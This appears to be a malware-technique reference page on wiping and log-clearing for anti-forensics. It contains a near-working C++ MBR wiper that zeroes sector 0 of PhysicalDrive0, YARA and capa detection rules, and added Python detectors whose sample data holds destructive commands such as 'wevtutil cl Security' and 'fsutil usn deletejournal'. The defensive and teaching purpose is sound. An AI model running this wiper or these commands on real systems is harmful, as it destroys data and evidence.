Wiping or Encrypting

Malware can use wiping or encryption to remove its traces from a system, for example by zeroing the Master Boot Record, overwriting files or clearing event logs so that investigators have nothing left to recover. The same technique can also serve as a decoy that draws attention away from the real intrusion, or as the payload itself in sabotage operations such as the Shamoon wipers covered by the detection rules below.

U0301

Code Snippets

Warning: the code below is a simple MBR wiper. It is deliberately left non-operational: the bytes-written variable `write` passed to WriteFile is never declared, so the snippet does not compile as-is. Opening \\.\PhysicalDrive0 for writing also requires administrator rights.

#include <Windows.h>
#include <iostream>

#define MBR_SIZE 512   // the MBR is the first 512-byte sector of the disk

using namespace std;

int WipeMBR(void) {
    // 512 zero bytes: written over sector 0 they destroy the boot code,
    // the partition table and the 0x55AA boot signature.
    char dmbr[MBR_SIZE];
    ZeroMemory(dmbr, sizeof(dmbr));

    // Open the raw physical disk (not a volume), bypassing the file system.
    // CreateFileA is used explicitly because the path is a narrow string.
    // No check for INVALID_HANDLE_VALUE is made; the snippet is illustrative.
    HANDLE disk = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);

    // Overwrite the first sector. The bytes-written output variable `write`
    // is intentionally undeclared, which is what keeps this from compiling.
    WriteFile(disk, dmbr, MBR_SIZE, &write, NULL);
    CloseHandle(disk);
    return 0;
}

int main() {
    cout << "Start Wiping" << endl;
    WipeMBR();
    return 0;
}
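The snippet above writes 512 zero bytes over sector 0. The following is an added example (not part of the original page or the Unprotect project) that shows the other side: parsing a first sector, checking the 0x55AA boot signature and the partition table, and recognising the all-zero sector such a wiper leaves behind. The sample MBR it builds is constructed, not captured from a real disk; read_first_sector() is the only part that touches a real device or image.

```python
"""Parse a 512-byte MBR and flag the zeroed sector a wiper leaves behind.

Added example for this page, not part of the original snippet. The sample
MBR below is constructed, not captured from a real disk.
"""
import struct

MBR_SIZE = 512
PARTITION_TABLE_OFFSET = 446      # four 16-byte entries end at offset 510
PARTITION_ENTRY_SIZE = 16
BOOT_SIGNATURE = b"\x55\xAA"      # last two bytes of a valid MBR


def parse_partition_table(mbr: bytes) -> list:
    """Return the four primary partition entries as dicts.

    One entry is: status (1 byte), CHS start (3), type (1), CHS end (3),
    LBA start (4, little-endian), sector count (4, little-endian).
    """
    entries = []
    for i in range(4):
        off = PARTITION_TABLE_OFFSET + i * PARTITION_ENTRY_SIZE
        status, ptype, lba_start, sectors = struct.unpack_from("<B3xB3xII", mbr, off)
        entries.append({"status": status, "type": ptype,
                        "lba_start": lba_start, "sectors": sectors})
    return entries


def check_mbr(mbr: bytes) -> list:
    """Return a list of findings; an empty list means the MBR looks intact."""
    if len(mbr) != MBR_SIZE:
        return ["unexpected sector length %d" % len(mbr)]
    if mbr == bytes(MBR_SIZE):
        # Exactly what WipeMBR() above writes: 512 zero bytes.
        return ["sector is all zeros: consistent with an MBR wipe"]
    findings = []
    if mbr[510:512] != BOOT_SIGNATURE:
        findings.append("missing 0x55AA boot signature")
    if mbr[:PARTITION_TABLE_OFFSET] == bytes(PARTITION_TABLE_OFFSET):
        findings.append("boot code area is all zeros")
    entries = parse_partition_table(mbr)
    if all(e["type"] == 0 for e in entries):
        findings.append("no partition entries defined")
    for i, e in enumerate(entries):
        if e["type"] != 0 and e["sectors"] == 0:
            findings.append("partition %d has type 0x%02x but zero length" % (i, e["type"]))
    return findings


def read_first_sector(path: str) -> bytes:
    """Read sector 0 from a disk image file or a raw device such as
    \\\\.\\PhysicalDrive0 (the latter needs administrator rights)."""
    with open(path, "rb") as f:
        return f.read(MBR_SIZE)


def build_sample_mbr() -> bytes:
    """Constructed healthy MBR: a few plausible boot-code bytes, one active
    NTFS (type 0x07) partition starting at LBA 2048, and the boot signature."""
    sector = bytearray(MBR_SIZE)
    sector[0:3] = b"\x33\xC0\x8E"
    entry = struct.pack("<B3sB3sII", 0x80, b"\x20\x21\x00", 0x07,
                        b"\xFE\xFF\xFF", 2048, 204800)
    sector[PARTITION_TABLE_OFFSET:PARTITION_TABLE_OFFSET + PARTITION_ENTRY_SIZE] = entry
    sector[510:512] = BOOT_SIGNATURE
    return bytes(sector)


WIPED_MBR = bytes(MBR_SIZE)   # the buffer WipeMBR() writes to sector 0

if __name__ == "__main__":
    for label, sector in (("sample", build_sample_mbr()), ("wiped", WIPED_MBR)):
        print(label, check_mbr(sector) or ["looks intact"])
```

Run it against a disk image with `check_mbr(read_first_sector("disk.img"))`; a sector that is not all zeros but fails the signature or partition checks points at a partial overwrite rather than the simple zero-fill shown in the snippet.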

Detection Rules

rule UNPROTECT_wiping_event
{
    meta:
        description = "Rule to detect wiping events logs"
        author = "McAfee ATR team | Thomas Roccia"
        date = "2020-11-10"
        rule_version = "v1"
        mitre = "T1070"
        hash = "c063c86931c662c1a962d08915d9f3a8"

    strings:
        $s1 = "wevtutil.exe" ascii wide nocase
        $s2 = "cl Application" ascii wide nocase
        $s3 = "cl System" ascii wide nocase
        $s4 = "cl Setup" ascii wide nocase
        $s5 = "cl Security" ascii wide nocase
        $s6 = "sl Security /e:false" ascii wide nocase
        $s7 = "usn deletejournal /D" ascii wide nocase

    condition:
        uint16(0) == 0x5a4d and 4 of them
}

import "pe"

rule Shamoon2_Wiper {
   meta:
      description = "Detects Shamoon 2.0 Wiper Component"
      author = "Florian Roth"
      reference = "https://goo.gl/jKIfGB"
      date = "2016-12-01"
      score = 70
      hash1 = "c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a"
      hash2 = "128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd"
   strings:
      $a1 = "\\??\\%s\\System32\\%s.exe" fullword wide
      $x1 = "IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB" wide
      $s1 = "UFWYNYNTS" fullword wide
      $s2 = "\\\\?\\ElRawDisk" fullword wide
   condition:
      ( uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 3 of them )
}

rule EldoS_RawDisk {
   meta:
      description = "EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0)"
      author = "Florian Roth (with Binar.ly)"
      reference = "https://goo.gl/jKIfGB"
      date = "2016-12-01"
      score = 50
      hash1 = "47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34"
      hash2 = "394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b"
   strings:
      $s1 = "g\\system32\\" fullword wide
      $s2 = "ztvttw" fullword wide
      $s3 = "lwizvm" fullword ascii
      $s4 = "FEJIKC" fullword ascii
      $s5 = "INZQND" fullword ascii
      $s6 = "IUTLOM" fullword wide
      $s7 = "DKFKCK" fullword ascii

      $op1 = { 94 35 77 73 03 40 eb e9 }
      $op2 = { 80 7c 41 01 00 74 0a 3d }
      $op3 = { 74 0a 3d 00 94 35 77 }
   condition:
      ( uint16(0) == 0x5a4d and filesize < 2000KB and 4 of them )
}

rule:
  meta:
    name: clear the Windows event log
    namespace: anti-analysis/anti-forensic/clear-logs
    author: michael.hunhoff@fireeye.com
    scope: basic block
    att&ck:
      - Defense Evasion::Indicator Removal on Host::Clear Windows Event Logs [T1070.001]
    examples:
      - 82BF6347ACF15E5D883715DC289D8A2B:0x14005E0C0
  features:
    - and:
      - api: advapi32.ElfClearEventLogFile
      - optional:
        - api: advapi32.OpenEventLog
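The UNPROTECT_wiping_event YARA rule and the capa rule above match a binary that embeds the log-clearing commands. The following is an added example (not part of the original page or the Unprotect project) that applies the same indicators at runtime to process-creation events and correlates them by parent process, since a single `wevtutil cl` is common administrative noise while one parent clearing several logs or disabling the Security log is the pattern worth alerting on. The events are constructed in the shape of Sysmon Event ID 1 / Security 4688 fields, not real telemetry; `clear-log` and `set-log` are wevtutil's long forms of `cl` and `sl`, and the USN journal command lives under `fsutil`.

```python
"""Apply the log-clearing indicators from the rules above to process-creation
events. Added example for this page, not part of the original rules or the
Unprotect project; the events below are constructed, not real telemetry."""
import re

# One compiled pattern per indicator family, matched case-insensitively like
# the YARA rule's `nocase` strings.
INDICATORS = {
    "clear_event_log": re.compile(
        r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+(?:application|system|setup|security)\b", re.I),
    "disable_security_log": re.compile(
        r"\bwevtutil(?:\.exe)?\s+(?:sl|set-log)\s+security\b.*?/e:false", re.I),
    "delete_usn_journal": re.compile(
        r"\b(?:fsutil(?:\.exe)?\s+)?usn\s+deletejournal\s+/D\b", re.I),
}

# Constructed events in the shape of Sysmon Event ID 1 / Security 4688 fields.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent_pid": 3988, "image": r"C:\Windows\System32\wevtutil.exe",
     "command_line": "wevtutil.exe cl Security"},
    {"pid": 4132, "parent_pid": 3988, "image": r"C:\Windows\System32\wevtutil.exe",
     "command_line": "wevtutil.exe cl System"},
    {"pid": 4140, "parent_pid": 3988, "image": r"C:\Windows\System32\wevtutil.exe",
     "command_line": "WEVTUTIL sl Security /e:false"},
    {"pid": 4150, "parent_pid": 3988, "image": r"C:\Windows\System32\fsutil.exe",
     "command_line": "fsutil usn deletejournal /D C:"},
    {"pid": 5010, "parent_pid": 2200, "image": r"C:\Windows\System32\wevtutil.exe",
     "command_line": "wevtutil qe Application /c:5 /f:text"},   # benign query, must not match
    {"pid": 5020, "parent_pid": 7000, "image": r"C:\Windows\System32\wevtutil.exe",
     "command_line": "wevtutil cl Application"},                # lone clear, below threshold
]


def scan_events(events: list) -> list:
    """Return (event_index, indicator_name, matched_text) for every match."""
    hits = []
    for i, ev in enumerate(events):
        cmd = ev.get("command_line", "")
        for name, pattern in INDICATORS.items():
            m = pattern.search(cmd)
            if m:
                hits.append((i, name, m.group(0).lower()))
    return hits


def correlate_by_parent(events: list, hits: list, threshold: int = 2) -> dict:
    """Group matches by the parent process that spawned them.

    Returns {parent_pid: sorted distinct matched commands} for every parent
    with at least `threshold` distinct anti-forensic commands; parents below
    the threshold are dropped as probable admin noise.
    """
    by_parent = {}
    for idx, _name, text in hits:
        by_parent.setdefault(events[idx].get("parent_pid"), set()).add(text)
    return {p: sorted(t) for p, t in by_parent.items() if len(t) >= threshold}


if __name__ == "__main__":
    hits = scan_events(SAMPLE_EVENTS)
    for idx, name, text in hits:
        print("event %d pid %d: %s (%s)" % (idx, SAMPLE_EVENTS[idx]["pid"], name, text))
    for ppid, cmds in correlate_by_parent(SAMPLE_EVENTS, hits).items():
        print("ALERT parent %d issued %d distinct anti-forensic commands" % (ppid, len(cmds)))
```

Feeding real Sysmon or 4688 events only requires mapping their CommandLine and ParentProcessId fields onto the `command_line` and `parent_pid` keys; the threshold is the knob to tune against how often administrators legitimately clear logs in a given environment.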
